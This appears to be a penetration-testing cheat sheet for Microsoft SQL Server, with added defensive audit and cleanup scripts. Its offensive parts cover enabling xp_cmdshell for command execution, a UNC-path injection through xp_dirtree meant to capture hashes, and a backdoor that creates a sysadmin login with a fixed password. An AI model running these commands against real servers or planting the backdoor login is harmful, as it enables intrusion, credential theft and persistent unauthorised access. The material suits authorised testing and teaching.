MSSQL
General
- Guest authentication may be enabled. If it is, check whether you can impersonate other logins.
- Look for linked servers; the login you reach the remote side as may differ from your current one, and impersonation may be possible there as well.
- If you are on a Windows server, look for inetpub configuration files.
Impacket-MSSQL
```bash
# authentication via Windows auth
impacket-mssqlclient LAB/myuser:mypass123@sql.lab.local -windows-auth
# mssqlclient recon (typed at the SQL> prompt)
enum_links
enum_logins
enum_impersonate
```
Helper
```text
proxychains4 -q impacket-mssqlclient LAB/myuser:mypass123@sql.lab.local -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'master'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (110 2789)
[!] Press help for extra shell commands
SQL (LAB\myuser dbo@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonated
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
```
SQL Commands
```sql
-- Current login name, i.e. the login you are connected as
-- with Windows auth this looks like LAB\user
SELECT SYSTEM_USER;
-- The database user (indicates the permissions your authenticated login has in the current database)
SELECT USER;
-- list databases
SELECT name FROM master..sysdatabases;
-- list linked servers
EXEC sp_linkedservers;
-- list logins available for impersonation
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
-- check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
-- enable xp_cmdshell (requires elevated privileges)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
-- UNC path injection - capture with Responder, smbserver, ntlmrelayx or equivalent
EXEC master..xp_dirtree '\\10.10.10.10\share\test.txt';
```
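The same settings seen from the DBA side. The block below is an added audit script, not part of the original cheat sheet: it reports whether xp_cmdshell is live or only staged, lists IMPERSONATE grants with both the grantee and the target login (the cheat-sheet query joins on the grantor only), shows linked-server login mappings, and finds databases where guest holds CONNECT. It assumes sysadmin (or VIEW SERVER STATE plus VIEW ANY DEFINITION); the login and database names in the remediation lines are placeholders.

```sql
-- Added defensive audit (not from the original page). Assumes sysadmin or
-- VIEW SERVER STATE + VIEW ANY DEFINITION. Names in the remediation section
-- ([sa], [LAB\lowpriv], [AppDb]) are placeholders.

-- 1. xp_cmdshell: 'value' is the staged setting, 'value_in_use' is what is live.
--    value = 1 with value_in_use = 0 means sp_configure ran without RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- 2. Server-level IMPERSONATE grants: who can become whom.
--    grantee_principal_id is the login holding the permission,
--    major_id is the login it may impersonate.
SELECT grantee.name AS can_impersonate,
       target.name  AS as_login,
       p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL';

-- 3. Linked servers and their login mappings. local_principal_id = 0 is the
--    catch-all mapping for every login not listed explicitly; a fixed
--    remote_name there means any local login reaches the remote side as that account.
SELECT s.name                      AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       CASE WHEN ll.local_principal_id = 0 THEN '<all other logins>'
            ELSE lp.name END       AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers s
LEFT JOIN sys.linked_logins ll     ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals lp ON ll.local_principal_id = lp.principal_id
WHERE s.is_linked = 1;

-- 4. Databases in which guest holds CONNECT. guest is expected in master, tempdb
--    and msdb; anywhere else it lets any login into the database without a mapped user.
--    sp_MSforeachdb is undocumented but shipped with every edition.
EXEC sp_MSforeachdb N'
    USE [?];
    SELECT DB_NAME() AS db, dp.name AS principal, pe.permission_name, pe.state_desc
    FROM sys.database_permissions pe
    JOIN sys.database_principals dp ON pe.grantee_principal_id = dp.principal_id
    WHERE dp.name = N''guest'' AND pe.permission_name = N''CONNECT'' AND pe.state = N''G'';';

-- Remediation for findings (placeholder names; apply per finding):
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
REVOKE IMPERSONATE ON LOGIN::[sa] FROM [LAB\lowpriv];   -- per row from query 2
-- USE [AppDb]; REVOKE CONNECT FROM guest;               -- per row from query 4 (not master/tempdb)
```

Run the four queries first and keep the output as a baseline; the remediation statements are written to be applied one finding at a time, since revoking guest CONNECT or an IMPERSONATE grant that an application relies on will break it.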
SQL Commands: Backdoor
Make a new database login (username TESTUSER, password L0ngP4ss123), map it to the db_owner role and assign the sysadmin role:
```sql
CREATE LOGIN [TESTUSER] WITH PASSWORD=N'L0ngP4ss123!';
CREATE USER [TESTUSER] FOR LOGIN [TESTUSER];
ALTER ROLE [db_owner] ADD MEMBER [TESTUSER];
EXEC master..sp_addrolemember @rolename=N'db_owner', @membername=N'TESTUSER';
EXEC master..sp_addsrvrolemember @rolename=N'sysadmin', @loginame=N'TESTUSER';
EXEC master..sp_addremotelogin 'SQLSRV01\SQLEXPRESS', 'TESTUSER';
```
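How the backdoor above shows up to a defender, and how it is removed. This is an added example, not part of the original page: it lists recently created or modified logins, current sysadmin members and legacy remote-login mappings, then sets up a SQL Server Audit so that later CREATE LOGIN / role-membership changes are recorded, and finally drops the sample login in reverse order. It assumes sysadmin; TESTUSER and SQLSRV01\SQLEXPRESS are the page's sample values, C:\SQLAudit\ is a placeholder path.

```sql
-- Added detection and cleanup for the login persistence shown above (not from the
-- original page). Assumes sysadmin. TESTUSER / SQLSRV01\SQLEXPRESS are the page's
-- sample values; C:\SQLAudit\ is a placeholder path that must exist on the host.

-- 1. Logins created or modified in the last 7 days (internal ##...## logins excluded).
SELECT name, type_desc, create_date, modify_date, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND name NOT LIKE '##%'
  AND modify_date >= DATEADD(day, -7, SYSDATETIME())
ORDER BY modify_date DESC;

-- 2. Current sysadmin membership; every row should be accounted for.
SELECT m.name AS member, m.type_desc, m.create_date
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin';

-- 3. Legacy remote-login mappings (what sp_addremotelogin writes).
SELECT s.name AS remote_server, rl.remote_name, lp.name AS local_login, rl.modify_date
FROM sys.remote_logins rl
JOIN sys.servers s ON rl.server_id = s.server_id
LEFT JOIN sys.server_principals lp ON rl.local_principal_id = lp.principal_id;

-- 4. Record future principal, role and permission changes with SQL Server Audit,
--    so the next CREATE LOGIN or sp_addsrvrolemember lands in a file you ship off-host.
USE master;
CREATE SERVER AUDIT [PrincipalChanges]
    TO FILE (FILEPATH = N'C:\SQLAudit\')
    WITH (ON_FAILURE = CONTINUE);
CREATE SERVER AUDIT SPECIFICATION [PrincipalChangesSpec]
    FOR SERVER AUDIT [PrincipalChanges]
    ADD (SERVER_PRINCIPAL_CHANGE_GROUP),
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),
    ADD (SERVER_PERMISSION_CHANGE_GROUP),
    ADD (DATABASE_ROLE_MEMBER_CHANGE_GROUP),
    ADD (AUDIT_CHANGE_GROUP)          -- also logs attempts to alter the audit itself
    WITH (STATE = ON);
ALTER SERVER AUDIT [PrincipalChanges] WITH (STATE = ON);

-- Reading the audit back:
SELECT event_time, action_id, server_principal_name, object_name, statement
FROM sys.fn_get_audit_file(N'C:\SQLAudit\*.sqlaudit', DEFAULT, DEFAULT)
ORDER BY event_time DESC;

-- 5. Removing the sample backdoor in the reverse order it was built.
ALTER SERVER ROLE [sysadmin] DROP MEMBER [TESTUSER];
EXEC sp_dropremotelogin 'SQLSRV01\SQLEXPRESS', 'TESTUSER';
-- in the database where CREATE USER ran:
-- ALTER ROLE [db_owner] DROP MEMBER [TESTUSER]; DROP USER [TESTUSER];
DROP LOGIN [TESTUSER];
```

DROP LOGIN fails while the login has an open session, so kill its sessions (sys.dm_exec_sessions by login_name) first; and because the audit spec above writes to a local file, forward that directory to a SIEM, otherwise whoever holds sysadmin can also delete the evidence.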
References and tools
- https://ppn.snovvcrash.rocks/pentest/infrastructure/dbms/mssql
- https://github.com/lefayjey/SharpSQLPwn
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://watchdogsacademy.gitbook.io/attacking-active-directory/mssql-servers-exploitation/mssql-trusted-links
- https://github.com/quentinhardy/msdat